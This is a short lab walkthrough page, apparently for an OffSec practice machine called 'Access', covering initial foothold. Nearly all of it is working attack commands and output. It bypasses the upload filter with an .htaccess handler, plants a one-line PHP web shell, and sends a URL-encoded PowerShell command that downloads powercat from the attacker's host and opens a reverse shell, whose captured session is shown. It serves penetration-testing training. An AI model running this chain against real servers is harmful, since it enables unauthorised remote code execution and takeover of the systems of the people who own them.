Foothold

Last updated 6 months ago

Foothold

$ cp /var/lib/inetsim/http/fakefiles/sample.jpg .

http://access.offsec/uploads/

$ vi shell.php

$ echo 'AddType application/x-httpd-php .pwned' > .htaccess

$ echo '<?php echo shell_exec($_GET["cmd"]); ?>' > cmd.pwned

$ curl http://192.168.157.187/uploads/cmd.pwned?cmd=whoami
access\svc_apache

$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

$ nc -lnvp 1337
listening on [any] 1337 ...

$ curl 'http://192.168.157.187/uploads/cmd.pwned?cmd=powershell.exe%20-c%20%22IEX%28New-Object%20System.Net.WebClient%29.DownloadString%28%27http%3A%2F%2F192.168.45.169%2Fpowercat.ps1%27%29%3Bpowercat%20-c%20192.168.45.169%20-p%201337%20-e%20powershell%22'

$ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.169] from (UNKNOWN) [192.168.157.187] 49939
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\xampp\htdocs\uploads> whoami 
whoami
access\svc_apache
PS C:\xampp\htdocs\uploads> ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.157.187
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.157.254
PS C:\xampp\htdocs\uploads>

Previous80 NextEunermation

Last updated 6 months ago